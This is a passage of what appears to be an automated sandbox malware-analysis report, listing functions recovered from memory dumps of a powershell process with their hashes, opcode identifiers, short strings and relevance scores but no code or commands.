                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl
                                                          • API String ID: 0-2571916112
                                                          • Opcode ID: 9cecd1dad9330f6db5209ca4e4bbe60d410676a321df0f548d01b901d3831571
                                                          • Instruction ID: 269db883716cb9d20e826114417fee386f1ececce05218ca6e5636425d14bd43
                                                          • Opcode Fuzzy Hash: 9cecd1dad9330f6db5209ca4e4bbe60d410676a321df0f548d01b901d3831571
                                                          • Instruction Fuzzy Hash: 57F14CB4A01209DFCB14DF98C540EAABBB2BF89304F14C19AE919AF751C772EC42CB51
                                                          Function 0741C985 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl
                                                          • API String ID: 0-2571916112
                                                          • Opcode ID: 18efec436bbc99be32c49f437eb8ddc929ff91de824a72b8d007b2c131e66f17
                                                          • Instruction ID: 3ccb78d8ae5d7696c22d122d938553492cf921122865ddf5b32f3f7841004ecc
                                                          • Opcode Fuzzy Hash: 18efec436bbc99be32c49f437eb8ddc929ff91de824a72b8d007b2c131e66f17
                                                          • Instruction Fuzzy Hash: BD815EB5A40205DFCB14DF58C981AEABBF2EF89314F15D59AD805AB351C732EC42CB61
                                                          Function 0741C998 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl
                                                          • API String ID: 0-2571916112
                                                          • Opcode ID: ff22939ca57d4f95e6c54d37bc9ef44cb768c90b5001f4416e4db6b0ed90d6e7
                                                          • Instruction ID: ef279eca6af36f8a7ee7bb9e4dccbaa38217aca41ff32460adaf3f3eeb0a8286
                                                          • Opcode Fuzzy Hash: ff22939ca57d4f95e6c54d37bc9ef44cb768c90b5001f4416e4db6b0ed90d6e7
                                                          • Instruction Fuzzy Hash: DE815CB4A40205DFCB14DF58C981EAABBF2EF89314F14D59AD905AB351CB32EC42CB61
                                                          Function 07415340 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: x.kk
                                                          • API String ID: 0-3782555193
                                                          • Opcode ID: 7b7e78134426e74a8561906a38fea2dcef6b661bfd92e61a73a7b69c4fb58bda
                                                          • Instruction ID: 79ab8efb1fe8794ba3ae43bdcd75705cda92911d206a871e3ffd5480af9e65d2
                                                          • Opcode Fuzzy Hash: 7b7e78134426e74a8561906a38fea2dcef6b661bfd92e61a73a7b69c4fb58bda
                                                          • Instruction Fuzzy Hash: 7B31B3B1B40110AFD704ABA8C951BAF7AA3AFC5300F249424E9017F7D1CF76AD428B92
                                                          Function 0741C638 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq
                                                          • API String ID: 0-1075809040
                                                          • Opcode ID: 86230ba2585604cdf5a8cda433f291f7696d7d826d3e23a033a3b5a5bdd5dbb9
                                                          • Instruction ID: bb29c3d8eaa45f37bae8c9f6293200ee38da87684aa3b6df4f98e964a0ad2d41
                                                          • Opcode Fuzzy Hash: 86230ba2585604cdf5a8cda433f291f7696d7d826d3e23a033a3b5a5bdd5dbb9
                                                          • Instruction Fuzzy Hash: D521F3F1B802039FDB206A688D813BF77A19B81650F180437D924DB391EB76D981C7B6
                                                          Function 0741541D Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: x.kk
                                                          • API String ID: 0-3782555193
                                                          • Opcode ID: 8ffc84065cdd9d9860faec65b4bd3f57075ce7b3ed462de569228fea84630875
                                                          • Instruction ID: 59fb4170caade93d35f414cdebab7c7f0083b7b01ecb578cbe01e22ca57ec58e
                                                          • Opcode Fuzzy Hash: 8ffc84065cdd9d9860faec65b4bd3f57075ce7b3ed462de569228fea84630875
                                                          • Instruction Fuzzy Hash: 5321D0B1A40214AFC700EBA8C545FDEBBB2EF85301F20D425E9016F791CB72AD42CB91
                                                          Function 0446ADF0 Relevance: .4, Instructions: 377COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 988de51709215915379e9f6b3051ef03c5ec4b4a73768d8b5039a1f66058135e
                                                          • Instruction ID: 29efa1b3c1504297740e8963273acea21ec17cbb98172586a7c97621d5b66f00
                                                          • Opcode Fuzzy Hash: 988de51709215915379e9f6b3051ef03c5ec4b4a73768d8b5039a1f66058135e
                                                          • Instruction Fuzzy Hash: 31F10A74A002599FCF15CF98D484A9EBBF2FF89314F24855AE815AB355CB31EC82CB91
                                                          Function 044672A0 Relevance: .3, Instructions: 318COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 820f0acd01217fdd6310343a2c1b78bb97a7c4e8a0de66d2f6f3c68fb5ff60f0
                                                          • Instruction ID: 62c20d142dc35c6362c56fd3cb7628238df526a9acf0c38988de9969d9bc8eae
                                                          • Opcode Fuzzy Hash: 820f0acd01217fdd6310343a2c1b78bb97a7c4e8a0de66d2f6f3c68fb5ff60f0
                                                          • Instruction Fuzzy Hash: D0C19D35A00208CFDF14DFA5C984A9EBBB2FF85314F15855AE406AB365DB34BD49CB81
                                                          Function 0446F004 Relevance: .3, Instructions: 277COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b01df12a887a7eb1b37132036e9cd3cb3570773f87b2ee77e2ae38bc4743d41
                                                          • Instruction ID: 19b0fd0b015e7a503009b843b9495b4c790ca18426a3f70f657a16ef6ad820e9
                                                          • Opcode Fuzzy Hash: 3b01df12a887a7eb1b37132036e9cd3cb3570773f87b2ee77e2ae38bc4743d41
                                                          • Instruction Fuzzy Hash: 42B13D70E00209DFDF10CFA9E9857DEBBF2AB48354F14812AE455A7354EB74A849CF92
                                                          Function 0446F8D5 Relevance: .3, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fb970ee27d0cbf7c75c90646bbfa1302be5514cbb74748c886e3cb8186bc1129
                                                          • Instruction ID: 8254ac51eea5132badff7214c6714f74cc1b3409f44bd34715a90403332e36dd
                                                          • Opcode Fuzzy Hash: fb970ee27d0cbf7c75c90646bbfa1302be5514cbb74748c886e3cb8186bc1129
                                                          • Instruction Fuzzy Hash: 4CB15070E002099FDF10CFA8E98579EBBF1BF48714F14852AE456E7354E774A849CB82
                                                          Function 04467A68 Relevance: .2, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 53e112266c6854a27653dc0707ece533f8057fcfb4ab9935cc0a039b85aecb57
                                                          • Instruction ID: bfef96b877b3902851c5dde13ee4b424080b6b2b6c8ecebd8554fe9d343f613e
                                                          • Opcode Fuzzy Hash: 53e112266c6854a27653dc0707ece533f8057fcfb4ab9935cc0a039b85aecb57
                                                          • Instruction Fuzzy Hash: 9571AD70A002198FDB24DF68C884A9EFBF6FF85318F14896AD4169B751DB31BC46CB91
                                                          Function 04467BD6 Relevance: .2, Instructions: 188COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b62b6a79a89ee72d7f43f00049d8dc303050102222126a3d027fa243189a2a04
                                                          • Instruction ID: 7a7145d80bf0271e922549a32aa01cb75741480ff324477bf3267e0ed45084be
                                                          • Opcode Fuzzy Hash: b62b6a79a89ee72d7f43f00049d8dc303050102222126a3d027fa243189a2a04
                                                          • Instruction Fuzzy Hash: BC715E70A002189FDF18DFA5D484BAEBBF6FF88308F14852AD412AB750DB75AD46CB41
                                                          Function 0741E8B8 Relevance: .2, Instructions: 178COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1f9774e923c5bb7937aa9d8bd08b68d068537452cd18c556b685f41318ba2869
                                                          • Instruction ID: 69f8fcb9beaf5288e4965d9db69fe176a16439ea1a490f772625fa86b0bec3e8
                                                          • Opcode Fuzzy Hash: 1f9774e923c5bb7937aa9d8bd08b68d068537452cd18c556b685f41318ba2869
                                                          • Instruction Fuzzy Hash: 98516BF6B101228FCB15ABB885416ABBBA2AFC1352F1484A7DD01DF351DF32C942C7A1
                                                          Function 07411078 Relevance: .1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 901cf552f3ccd7ade5a1e58e1ebd3483b903b9e31c844816ed71d2356c9fac6f
                                                          • Instruction ID: a319f07f659f85c9adcc4e3b133ef587a9bc7e9e412ba4416d36d09645dd78fc
                                                          • Opcode Fuzzy Hash: 901cf552f3ccd7ade5a1e58e1ebd3483b903b9e31c844816ed71d2356c9fac6f
                                                          • Instruction Fuzzy Hash: E44148B2B001599BCB14ABB998001EEFBA6AFC8310F24857BD916EB341DF32DD41C791
                                                          Function 044677F9 Relevance: .1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7950e69761a9a075b179e643ae39205399cfd9b6c132516984739894eed88002
                                                          • Instruction ID: beedfd0d1151c877b21e34ee0d9e53995155d4adda91e3ab849917ed0d934171
                                                          • Opcode Fuzzy Hash: 7950e69761a9a075b179e643ae39205399cfd9b6c132516984739894eed88002
                                                          • Instruction Fuzzy Hash: 6741A131A002148FEB15DB74C958AAE7BF2EF89354F44446AD507EB7A0CB35AD41CB90
                                                          Function 04467A53 Relevance: .1, Instructions: 120COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aa1de382323bdb7da75db91920d5078a3ad96710df185bc574bd6c49bf4fdcc9
                                                          • Instruction ID: d219978e62263b31c40703a98dda1b1dc620960f8f51551b5eae8a9bbcc9cfe9
                                                          • Opcode Fuzzy Hash: aa1de382323bdb7da75db91920d5078a3ad96710df185bc574bd6c49bf4fdcc9
                                                          • Instruction Fuzzy Hash: ED418170A002188FDB24DFA5C8447AEBBF6FF84344F14856AD006AB790DB75AC45CB91
                                                          Function 0741E89D Relevance: .1, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 336557b3c34aedafdf6f5decdd1593ec624f0ec7e2188d119de8a541f634f254
                                                          • Instruction ID: 3f8660ff8793a0ab74639faac7382a5b8793a447f89a91ca10391c1daaf4e6e6
                                                          • Opcode Fuzzy Hash: 336557b3c34aedafdf6f5decdd1593ec624f0ec7e2188d119de8a541f634f254
                                                          • Instruction Fuzzy Hash: F2416AFAA10222CFCB24AF248541BF77BA2AF85342F1884A7DC019F351D735D942C7A1
                                                          Function 0446B0F7 Relevance: .1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d24fb14d3519dcfa62d2ad423abec7ea98a3228300b090ca518f64a0b391201
                                                          • Instruction ID: a90b2f72a5ecc12defe425ebe0cc2e810b481a16cd06eee33d49a5fef5d09595
                                                          • Opcode Fuzzy Hash: 7d24fb14d3519dcfa62d2ad423abec7ea98a3228300b090ca518f64a0b391201
                                                          • Instruction Fuzzy Hash: 4D51EB74A00259AFDF15CF98D984A9DFBB2FF88314F248559E805A7365CB31AC82DF50
                                                          Function 04462BB0 Relevance: .1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b7e4fa1606757b80be5e0db36385c793d3b38235f6342a9fc61e9da57b8fa524
                                                          • Instruction ID: 32bfb3206f3ccce364acabafe2abda9098f4eb979296433a63013fd12b9450d8
                                                          • Opcode Fuzzy Hash: b7e4fa1606757b80be5e0db36385c793d3b38235f6342a9fc61e9da57b8fa524
                                                          • Instruction Fuzzy Hash: 6A416974A001099FCB09DF99C5949EEFBB1FF48314B15869AD802AB3A5C732FC51CBA4
                                                          Function 07411418 Relevance: .1, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6431e207db35369eb1b9a9e995554e71b8abd7a8b4352d6103c2adee8a739bf7
                                                          • Instruction ID: bb17d4cf63096adfbfaece164496f3fdc75e53888e818d62606ff399e95e50c0
                                                          • Opcode Fuzzy Hash: 6431e207db35369eb1b9a9e995554e71b8abd7a8b4352d6103c2adee8a739bf7
                                                          • Instruction Fuzzy Hash: 7C218EF175031A5BCF2467BE5900BB7B6D65BC5B14F24843BE605CB381EE35D8818360
                                                          Function 0446C5D8 Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f0994dae0e31634ec2a3c836aff5dd9ff4a7ca05c524a844991936aae71e1a6
                                                          • Instruction ID: 505454a399a3717aa5f3e4221db0059a3e48537dd6f73d3ad4cbf4b49ce903d9
                                                          • Opcode Fuzzy Hash: 4f0994dae0e31634ec2a3c836aff5dd9ff4a7ca05c524a844991936aae71e1a6
                                                          • Instruction Fuzzy Hash: B7312A34B011289FCF25DB64C8956EEB7B2AF89304F1044EAD50AAB351DB35EE85CF81
                                                          Function 0446ADE0 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26275901a96f188fb5a49cf6f4d63349b5db306e5080d509c747502479e8bd59
                                                          • Instruction ID: fc618129363949bc83fb427a77ff171b4447a92737e6c7b2bcdabf9b5d7482dd
                                                          • Opcode Fuzzy Hash: 26275901a96f188fb5a49cf6f4d63349b5db306e5080d509c747502479e8bd59
                                                          • Instruction Fuzzy Hash: 653137B5A006059FCB14CF98C9849AEFBB1FF89310B258699D95ABB351C731FC41CBA1
                                                          Function 07411059 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ccdf9443696a3305119002933474c161b473dfc3eb2183f3bb272aa99930fec0
                                                          • Instruction ID: c37a7508ecb97b35a9c430d2f6dca671318aff74af1a2f865bfee790096d034b
                                                          • Opcode Fuzzy Hash: ccdf9443696a3305119002933474c161b473dfc3eb2183f3bb272aa99930fec0
                                                          • Instruction Fuzzy Hash: 8A2168B19043998FCB14AF7588001EEFFB0AF89210B2985ABCD05EB342EA309D45CB91
                                                          Function 074113FD Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ddbb08c0c6c86bedc086e71edc87f21589b32491725f1ed274dfe5e668aa30c2
                                                          • Instruction ID: 88ff3f78ff6567217e9427066142e18d4a16944daca850bb8206d28d5cf0e219
                                                          • Opcode Fuzzy Hash: ddbb08c0c6c86bedc086e71edc87f21589b32491725f1ed274dfe5e668aa30c2
                                                          • Instruction Fuzzy Hash: C6216BF17043996BCB206B6A49517A67AA25F82714F284477E601CB3C2FA79C885C361
                                                          Function 0741E3D8 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 50d7be82c3cb2b3fe9c6fbdfc1adfba3a36d0743e14ed722ded8c48bfd8de416
                                                          • Instruction ID: 0697e736f2642d0d26b62bdb1552136d06f22d2ecfa6099be43a38ffda9c0cd7
                                                          • Opcode Fuzzy Hash: 50d7be82c3cb2b3fe9c6fbdfc1adfba3a36d0743e14ed722ded8c48bfd8de416
                                                          • Instruction Fuzzy Hash: 3B11B6F5B401169FCB50DE69C541AAAB7E6AF88325F14C076DC09DB351DB31D902CBA1
                                                          Function 07411208 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: afb7fa04bf7628d16b07e804efdd9c2aef461e7cd5379b826d7d7ebd4e48595a
                                                          • Instruction ID: 20c9ec9df603dd7f833cb23193b2fa8fb2b2d38038c839dbdd8befa498b7530f
                                                          • Opcode Fuzzy Hash: afb7fa04bf7628d16b07e804efdd9c2aef461e7cd5379b826d7d7ebd4e48595a
                                                          • Instruction Fuzzy Hash: 5D01477631021ACBC72066AAE4001BBB799DFC6222F14C4BFDA45DBB41DA72C846D360
                                                          Function 0446B204 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea7593f21fe8a70922feda10464d4963121ee170d0d58460169bf0f9e461f6b7
                                                          • Instruction ID: b4c5178228d93c75f50786230cb7cbdcc9082dc385f33ba1ba5f0195f19afa2e
                                                          • Opcode Fuzzy Hash: ea7593f21fe8a70922feda10464d4963121ee170d0d58460169bf0f9e461f6b7
                                                          • Instruction Fuzzy Hash: 0B110734A00259AFCF05CFA8D884A9DFBB2FF48314F288549E405AB365C771A882CF50
                                                          Function 02C4D005 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746312811.0000000002C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2c4d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81a4de962ed26a113edf093ab73f0a40bf5f264ace1a483f08651352ede8e65d
                                                          • Instruction ID: f042b8846353aa0c95e6edcb26033b6a02f30d38da4c44c8a419a1d6f62e246f
                                                          • Opcode Fuzzy Hash: 81a4de962ed26a113edf093ab73f0a40bf5f264ace1a483f08651352ede8e65d
                                                          • Instruction Fuzzy Hash: 96015E6240E3C05FD7128B258994B52BFB8DF53224F1DC1DBE9888F1A3C6695849C7B2
                                                          Function 02C4D01D Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746312811.0000000002C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2c4d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9dcdde4b9c2eacdd3acc26eec9a23060eb47582286000891f45a3aa62a1fb14
                                                          • Instruction ID: 8cddc454877957187f75306ddc556542674e7b4cd624594aa5ab24445b9014c5
                                                          • Opcode Fuzzy Hash: c9dcdde4b9c2eacdd3acc26eec9a23060eb47582286000891f45a3aa62a1fb14
                                                          • Instruction Fuzzy Hash: C901DB714053409AE7106E26CDC4B67BF98DF81374F18C51AFD4A4B142CF79A941C6F1
                                                          Function 07411DB7 Relevance: .0, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 913fedfdabb12ffbe92392451ce87d7584920e3e7a5771f6a0489f3bbbfe9505
                                                          • Instruction ID: 021c9a0449226f80f71251a6bc331b2fc4d6bde8f124ea6cdb26bcf0f4bb704f
                                                          • Opcode Fuzzy Hash: 913fedfdabb12ffbe92392451ce87d7584920e3e7a5771f6a0489f3bbbfe9505
                                                          • Instruction Fuzzy Hash: DBB092242051404FC2018A20CA51414BB20AA82204328C0EA98048B252CA22A907E700

                                                          Non-executed Functions

                                                          Function 02C4D6E0 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746312811.0000000002C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2c4d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e88dbbeb88ac0bb6013723ae8f59ce995a92331b79c5644e5b7478e365ac3978
                                                          • Instruction ID: 315ddc3149f01ffc1981a2481d0f51d2b9a5af92917269c9ab316521d230fe3b
                                                          • Opcode Fuzzy Hash: e88dbbeb88ac0bb6013723ae8f59ce995a92331b79c5644e5b7478e365ac3978
                                                          • Instruction Fuzzy Hash: 7B21D3B6504200DFDB15EF14D9C0F27BF65FB84324F24C569E90A4B25AC736D456CAA1
                                                          Function 0741A954 Relevance: 11.5, Strings: 9, Instructions: 207COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$84xl$84xl$tPsq$tPsq$$sq$(yq$(yq$(yq
                                                          • API String ID: 0-2463238278
                                                          • Opcode ID: a2ab2976a62f2524444819d12314639511aecc27365804588d4c0fad91502380
                                                          • Instruction ID: f1f83cdcd22215630f65b36dc855be30c960ccfa0f12a3b94dde1f246513a282
                                                          • Opcode Fuzzy Hash: a2ab2976a62f2524444819d12314639511aecc27365804588d4c0fad91502380
                                                          • Instruction Fuzzy Hash: E271C2B07022459FCB24EE58C940BFAB7B2AF85310F19C45BE905AB391D731DC85CB91
                                                          Function 0741CDF0 Relevance: 10.4, Strings: 8, Instructions: 407COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
